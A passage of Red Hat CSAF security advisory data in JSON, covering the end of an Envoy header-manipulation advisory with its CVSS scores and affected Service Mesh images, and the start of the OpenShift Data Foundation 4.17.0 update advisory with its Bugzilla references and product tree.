"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Potential to manipulate `x-envoy` headers from external sources"
}
]
}
RHSA-2024_8676
Vulnerability from csaf_redhat - Published: 2024-10-30 14:25 - Updated: 2024-12-18 04:38Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update
Notes
Topic
Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.
These updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:
https://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index
All Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.\n\nThese updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index\n\nAll Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8676",
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2059669",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2059669"
},
{
"category": "external",
"summary": "2190161",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2190161"
},
{
"category": "external",
"summary": "2219310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219310"
},
{
"category": "external",
"summary": "2241329",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241329"
},
{
"category": "external",
"summary": "2245068",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245068"
},
{
"category": "external",
"summary": "2250364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250364"
},
{
"category": "external",
"summary": "2253013",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253013"
},
{
"category": "external",
"summary": "2257271",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257271"
},
{
"category": "external",
"summary": "2259668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259668"
},
{
"category": "external",
"summary": "2262777",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262777"
},
{
"category": "external",
"summary": "2268046",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268046"
},
{
"category": "external",
"summary": "2268820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268820"
},
{
"category": "external",
"summary": "2271773",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2271773"
},
{
"category": "external",
"summary": "2272597",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272597"
},
{
"category": "external",
"summary": "2275225",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2275225"
},
{
"category": "external",
"summary": "2275965",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2275965"
},
{
"category": "external",
"summary": "2276393",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276393"
},
{
"category": "external",
"summary": "2276672",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276672"
},
{
"category": "external",
"summary": "2279751",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279751"
},
{
"category": "external",
"summary": "2279876",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279876"
},
{
"category": "external",
"summary": "2280308",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280308"
},
{
"category": "external",
"summary": "2280608",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280608"
},
{
"category": "external",
"summary": "2280637",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280637"
},
{
"category": "external",
"summary": "2283994",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283994"
},
{
"category": "external",
"summary": "2292435",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292435"
},
{
"category": "external",
"summary": "2292668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292668"
},
{
"category": "external",
"summary": "2294234",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294234"
},
{
"category": "external",
"summary": "2294723",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294723"
},
{
"category": "external",
"summary": "2297265",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297265"
},
{
"category": "external",
"summary": "2297295",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297295"
},
{
"category": "external",
"summary": "2297447",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297447"
},
{
"category": "external",
"summary": "2297454",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297454"
},
{
"category": "external",
"summary": "2299630",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299630"
},
{
"category": "external",
"summary": "2299639",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299639"
},
{
"category": "external",
"summary": "2300021",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300021"
},
{
"category": "external",
"summary": "2300312",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300312"
},
{
"category": "external",
"summary": "2300331",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300331"
},
{
"category": "external",
"summary": "2300499",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300499"
},
{
"category": "external",
"summary": "2301889",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301889"
},
{
"category": "external",
"summary": "2302201",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302201"
},
{
"category": "external",
"summary": "2302257",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302257"
},
{
"category": "external",
"summary": "2302448",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302448"
},
{
"category": "external",
"summary": "2302507",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302507"
},
{
"category": "external",
"summary": "2302575",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302575"
},
{
"category": "external",
"summary": "2302774",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302774"
},
{
"category": "external",
"summary": "2302841",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302841"
},
{
"category": "external",
"summary": "2302842",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302842"
},
{
"category": "external",
"summary": "2303028",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303028"
},
{
"category": "external",
"summary": "2303342",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303342"
},
{
"category": "external",
"summary": "2303403",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303403"
},
{
"category": "external",
"summary": "2303619",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303619"
},
{
"category": "external",
"summary": "2303820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303820"
},
{
"category": "external",
"summary": "2303821",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303821"
},
{
"category": "external",
"summary": "2303822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303822"
},
{
"category": "external",
"summary": "2303823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303823"
},
{
"category": "external",
"summary": "2303824",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303824"
},
{
"category": "external",
"summary": "2303825",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303825"
},
{
"category": "external",
"summary": "2303829",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303829"
},
{
"category": "external",
"summary": "2304073",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304073"
},
{
"category": "external",
"summary": "2304231",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304231"
},
{
"category": "external",
"summary": "2304232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304232"
},
{
"category": "external",
"summary": "2304235",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304235"
},
{
"category": "external",
"summary": "2304238",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304238"
},
{
"category": "external",
"summary": "2304799",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304799"
},
{
"category": "external",
"summary": "2304810",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304810"
},
{
"category": "external",
"summary": "2304815",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304815"
},
{
"category": "external",
"summary": "2304993",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304993"
},
{
"category": "external",
"summary": "2305274",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305274"
},
{
"category": "external",
"summary": "2305295",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305295"
},
{
"category": "external",
"summary": "2305660",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305660"
},
{
"category": "external",
"summary": "2305880",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305880"
},
{
"category": "external",
"summary": "2306026",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306026"
},
{
"category": "external",
"summary": "2306387",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306387"
},
{
"category": "external",
"summary": "2306577",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306577"
},
{
"category": "external",
"summary": "2307823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307823"
},
{
"category": "external",
"summary": "2307835",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307835"
},
{
"category": "external",
"summary": "2307909",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307909"
},
{
"category": "external",
"summary": "2308091",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308091"
},
{
"category": "external",
"summary": "2308101",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308101"
},
{
"category": "external",
"summary": "2308144",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308144"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2308304",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308304"
},
{
"category": "external",
"summary": "2308442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308442"
},
{
"category": "external",
"summary": "2308446",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308446"
},
{
"category": "external",
"summary": "2309191",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309191"
},
{
"category": "external",
"summary": "2309195",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309195"
},
{
"category": "external",
"summary": "2309485",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309485"
},
{
"category": "external",
"summary": "2309486",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309486"
},
{
"category": "external",
"summary": "2309487",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309487"
},
{
"category": "external",
"summary": "2309488",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309488"
},
{
"category": "external",
"summary": "2309489",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309489"
},
{
"category": "external",
"summary": "2309700",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309700"
},
{
"category": "external",
"summary": "2310369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310369"
},
{
"category": "external",
"summary": "2310385",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310385"
},
{
"category": "external",
"summary": "2310841",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310841"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311042",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311042"
},
{
"category": "external",
"summary": "2311043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311043"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2311468",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311468"
},
{
"category": "external",
"summary": "2311551",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311551"
},
{
"category": "external",
"summary": "2311790",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311790"
},
{
"category": "external",
"summary": "2311867",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311867"
},
{
"category": "external",
"summary": "2311885",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311885"
},
{
"category": "external",
"summary": "2311893",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311893"
},
{
"category": "external",
"summary": "2312137",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312137"
},
{
"category": "external",
"summary": "2312442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312442"
},
{
"category": "external",
"summary": "2313178",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313178"
},
{
"category": "external",
"summary": "2313203",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313203"
},
{
"category": "external",
"summary": "2313515",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313515"
},
{
"category": "external",
"summary": "2313717",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313717"
},
{
"category": "external",
"summary": "2313736",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313736"
},
{
"category": "external",
"summary": "2314200",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314200"
},
{
"category": "external",
"summary": "2314211",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314211"
},
{
"category": "external",
"summary": "2314404",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314404"
},
{
"category": "external",
"summary": "2314454",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314454"
},
{
"category": "external",
"summary": "2314636",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314636"
},
{
"category": "external",
"summary": "2315624",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315624"
},
{
"category": "external",
"summary": "2315651",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315651"
},
{
"category": "external",
"summary": "2315666",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315666"
},
{
"category": "external",
"summary": "2315709",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315709"
},
{
"category": "external",
"summary": "2315733",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315733"
},
{
"category": "external",
"summary": "2315846",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315846"
},
{
"category": "external",
"summary": "2318490",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318490"
},
{
"category": "external",
"summary": "2319102",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319102"
},
{
"category": "external",
"summary": "2319238",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319238"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8676.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, \u0026 Bug Fix Update",
"tracking": {
"current_release_date": "2024-12-18T04:38:16+00:00",
"generator": {
"date": "2024-12-18T04:38:16+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:8676",
"initial_release_date": "2024-10-30T14:25:22+00:00",
"revision_history": [
{
"date": "2024-10-30T14:25:22+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-30T14:25:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-18T04:38:16+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHODF 4.17 for RHEL 9",
"product": {
"name": "RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_data_foundation:4.17::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Data Foundation"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product_id": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product_id": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product_id": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product_id": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product_id": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product_identification_helper": {
